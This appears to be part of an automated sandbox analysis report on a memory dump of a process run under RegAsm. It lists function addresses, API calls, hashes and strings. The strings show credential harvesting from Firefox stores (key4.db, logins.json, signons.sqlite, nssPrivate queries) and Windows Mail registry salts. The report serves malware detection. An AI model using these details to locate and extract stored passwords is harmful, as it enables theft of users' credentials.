                                                                                                                                                                                • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                • API String ID: 2303586283-933021314
                                                                                                                                                                                • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406782
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                Strings
                                                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                • API String ID: 710961058-601624466
                                                                                                                                                                                • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                • API String ID: 2003275452-3138536805
                                                                                                                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                • API String ID: 1439213657-1959339147
                                                                                                                                                                                • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                • String ID: salu
                                                                                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                                                                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                • API String ID: 2976261921-2687544566
                                                                                                                                                                                • Opcode ID: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                • Opcode Fuzzy Hash: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F6A
